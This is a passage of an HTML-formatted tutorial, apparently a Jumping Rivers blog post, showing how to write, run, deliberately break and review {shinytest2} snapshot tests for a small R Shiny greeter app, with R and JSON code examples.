&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To turn that into a usable test, we create a test file in
&lt;code&gt;./tests/testthat/&lt;/code&gt; with a meaningful name. We’ll call it
&lt;code&gt;test-e2e-greeter_accepts_username.R&lt;/code&gt;. The “e2e” in the file name
indicates that this is an “end-to-end” test (it tests against the
running app), and so distinguishes it from your unit tests and
&lt;code&gt;testServer()&lt;/code&gt;-driven reactivity tests.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add the test script `./tests/testthat/test-e2e-greeter_accepts_username.R`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_test&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e2e-greeter_accepts_username&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We use the test skeleton described above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;(Note that the window-size command isn’t really part of the test, so we
separate it from the test actions.)&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-recorder-with-greeting.png" alt="The test-recorder panel after the user inputs their name. As in the previous image, but the input box now contains the text 'Jumping Rivers' and beneath the Greet button are the words 'Hello Jumping Rivers!' The {shinytest2} panel code section now contains more lines of code about what occurred in the test." /&gt;
&lt;h2 id="running-your-first-test"&gt;Running your first test&lt;/h2&gt;
&lt;p&gt;You’ve written a test. Now how do you run it?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Method 1:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - Type this in the console to load the package and run the tests in your R session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Method 2:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - In RStudio, use the &amp;#34;Ctrl-Shift-T&amp;#34; shortcut to run the tests in a separate session&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Method 3:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - Load the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - and then run the tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_local&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Each of these approaches will load the current version of the package
and run any tests found within it.&lt;/p&gt;
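&lt;p&gt;While iterating on a single end-to-end test, it can be quicker to run
only the matching test files. The following is a minimal sketch, assuming
the “e2e” file-naming convention used above (the filter pattern is our own
choice, not something {shinytest2} requires):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Run only the test files whose names match &amp;#34;e2e&amp;#34;
# (the pattern is matched against the file name without &amp;#34;test-&amp;#34; and &amp;#34;.R&amp;#34;)
devtools::test(filter = &amp;#34;e2e&amp;#34;)

# Or run a single test file from the package root
devtools::test_active_file(&amp;#34;tests/testthat/test-e2e-greeter_accepts_username.R&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;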
&lt;p&gt;It’s important to know that when your tests run, the app and the tests
run in different R sessions from each other. &lt;code&gt;devtools::test()&lt;/code&gt; and
the other approaches above load the ‘under-development’ version of your package into the
session where the tests run. However, that isn’t where the app runs. For our
simple app, the code above is sufficient to ensure that the
‘under-development’ version of the app is used when the tests run
(&lt;code&gt;AppDriver$new(shinyGreeter::run())&lt;/code&gt; passes the correct version of the
app to the app-session). In more complicated situations, you may need to
install your package prior to running the {shinytest2}-based tests
(please see the
&lt;a href="https://rstudio.github.io/shinytest2/articles/use-package.html" rel="external"&gt;documentation&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;When the test initially runs, a couple of warnings will show up.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-initial-snapshot-warning.png" alt="Warnings are thrown when a snapshot test is first run. The console in which the tests have been run showing two warnings. 'the greeter app updates users name on clicking the button' and 'the greeter app updates users name on clicking the button', each followed by 'new file snapshot: tests/testthat/_snaps/greeter-001_.png' The final lines are 'Results, Duration: 2.3 s, [FAIL 0 | WARN 2 | SKIP 0 | PASS 1]'" /&gt;
&lt;p&gt;These indicate that some snapshot files have been saved within your
repository. The snapshots provide a ground truth against which
subsequent test runs are compared. For the test we’ve just written, the
snapshots are saved in the directory
&lt;code&gt;./tests/testthat/_snaps/e2e-greeter_accepts_username/&lt;/code&gt; as
&lt;code&gt;greeter-001_.png&lt;/code&gt; and &lt;code&gt;greeter-001.json&lt;/code&gt; and contain a picture of the
state of the app (in the &lt;code&gt;.png&lt;/code&gt;) and any input / output / export values
that are stored by Shiny (in the &lt;code&gt;.json&lt;/code&gt;) at the point when
&lt;code&gt;app$expect_values()&lt;/code&gt; was called.&lt;/p&gt;
&lt;p&gt;Important: If you change the code for either your app, or your tests,
you may have to update these snapshot files.&lt;/p&gt;
&lt;h3 id="rerunning-your-first-test"&gt;Rerunning your first test&lt;/h3&gt;
&lt;p&gt;We have written our first test case, and by doing an initial run, we
have saved some snapshot files that contain our expectations for that
test case.&lt;/p&gt;
&lt;p&gt;If we now rerun the test using “Ctrl-Shift-T”, we see that the test
passes, and we no longer see the warnings that arise when initially
saving the snapshot files.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-first-passing-test.png" alt="The first successful snapshot test run. The console where the test was run, containing the text 'Loading shinyGreeter, Testing shinyGreeter, Loading required package: shiny, tick symbol | F W S OK | Context, tick symbol, | 1 | e2e-greeter_accepts_username [2.8s], Results, Duration: 2.8 s, [FAIL 0 | WARN 0 | SKIP 0 | PASS 1]'" /&gt;
&lt;h2 id="breaking-your-test-andor-your-app"&gt;Breaking your test and/or your app&lt;/h2&gt;
&lt;p&gt;We’ve got a passing test. Great!&lt;/p&gt;
&lt;p&gt;Now let’s break it!&lt;/p&gt;
&lt;p&gt;Sorry, what?&lt;/p&gt;
&lt;p&gt;One of the purposes of these tests is to highlight when / where you’ve
introduced some code that causes some important aspect of your app to
break. So if we don’t know that the tests will fail when they should in
an artificial setting, how can we expect them to fail when we need them
to?&lt;/p&gt;
&lt;p&gt;Let’s keep the snapshot files as they are and modify the test code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Robots&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the test case modified, it now fails when the tests are run,
printing the following message:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Failure &lt;/span&gt;(test&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;e2e&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;greeter_accepts_username.R&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; the greeter app updates user&lt;span style="color:#a5d6ff"&gt;&amp;#39;s name on clicking
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;the button
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Snapshot of `file` to &amp;#39;&lt;/span&gt;e2e&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;greeter_accepts_username&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;greeter&lt;span style="color:#a5d6ff"&gt;-001&lt;/span&gt;.json&lt;span style="color:#a5d6ff"&gt;&amp;#39; has changed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Run `testthat::snapshot_review(&amp;#39;&lt;/span&gt;e2e&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;greeter_accepts_username&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;)` to review changes
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;# ... snip ...
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;Warning (test-e2e-greeter_accepts_username.R:13:3): the greeter app updates user&amp;#39;&lt;/span&gt;s name on clicking
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;the button
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Diff &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; snapshot file `e2e-greeter_accepts_usernamegreeter-001.json`
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; before
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; after
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;@@&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;@@&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;input&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Robots&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;output&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Robots!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;export&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We would have got the same test failure and a similar warning if we had
left the test case unmodified and instead broken the app, for example by
hard-coding it to bind “Hello Jumping Robots!” to &lt;code&gt;output$greeting&lt;/code&gt;.
You can verify that for yourself.&lt;/p&gt;
&lt;p&gt;If we look in the &lt;code&gt;tests/testthat/_snaps&lt;/code&gt; directory, we see that the
test failure has led to two new files being added. We have &lt;code&gt;greeter-001_.new.png&lt;/code&gt; and
&lt;code&gt;greeter-001.new.json&lt;/code&gt; in addition to the snapshot files that were added
when the (correct) test case was initially run. The new files are the
output from the app for the broken version of our test.&lt;/p&gt;
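&lt;p&gt;Pending snapshot files like these are easy to overlook in a larger
test suite. As an illustration, the base-R sketch below lists any files
awaiting review. The helper &lt;code&gt;find_new_snapshots()&lt;/code&gt; is hypothetical (it is
not part of {testthat} or {shinytest2}) and assumes that pending snapshots
contain &lt;code&gt;.new.&lt;/code&gt; in their file name, as they do above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: list snapshot files that are awaiting review.
# Returns paths relative to `snaps_dir` (an empty vector if there are none).
find_new_snapshots = function(snaps_dir = &amp;#34;tests/testthat/_snaps&amp;#34;) {
  list.files(snaps_dir, pattern = &amp;#34;\\.new\\.&amp;#34;, recursive = TRUE)
}

# Run from the package root
find_new_snapshots()
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;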
&lt;p&gt;We can compare what the app images look like after the two versions of
the test using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot_review&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;e2e-greeter_accepts_username/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That opens a Shiny app that allows us to update the snapshot files,
should we wish to.&lt;/p&gt;
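&lt;p&gt;If you have already inspected the differences and are happy with all
of them, {testthat} also offers a non-interactive route. A short sketch,
to be used with care because it overwrites the stored expectations:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Accept every pending snapshot for this test file
# without opening the review app
testthat::snapshot_accept(&amp;#34;e2e-greeter_accepts_username/&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this walkthrough the new snapshots come from a deliberately broken
test, so we would not accept them here.&lt;/p&gt;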
&lt;p&gt;But the .json is a bit more interesting. This is the content for the
original test-case:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;input&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;output&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Jumping Rivers!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;export&amp;#34;&lt;/span&gt;: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For the modified test-case, the &lt;code&gt;input$name&lt;/code&gt; and &lt;code&gt;output$greeting&lt;/code&gt;
values are modified.&lt;/p&gt;
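&lt;p&gt;To see programmatically which values differ between two snapshot
files, they can be read with {jsonlite}. This is a minimal sketch rather
than something {shinytest2} does for you: the helper &lt;code&gt;changed_values()&lt;/code&gt;
is hypothetical, and the snapshot contents are inlined as strings
(mirroring the files above) so that the example runs on its own.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(jsonlite)

# Hypothetical helper: names of the values that differ between two parsed
# snapshots. Values are flattened to &amp;#34;section.name&amp;#34; entries before comparing.
changed_values = function(old, new) {
  old_flat = unlist(old)
  new_flat = unlist(new)
  all_names = union(names(old_flat), names(new_flat))
  differs = vapply(
    all_names,
    function(nm) !identical(old_flat[nm], new_flat[nm]),
    logical(1)
  )
  all_names[differs]
}

# Inlined copies of the original and modified snapshot contents
old = fromJSON(&amp;#39;{&amp;#34;input&amp;#34;: {&amp;#34;greet&amp;#34;: 1, &amp;#34;name&amp;#34;: &amp;#34;Jumping Rivers&amp;#34;},
  &amp;#34;output&amp;#34;: {&amp;#34;greeting&amp;#34;: &amp;#34;Hello Jumping Rivers!&amp;#34;}, &amp;#34;export&amp;#34;: {}}&amp;#39;)
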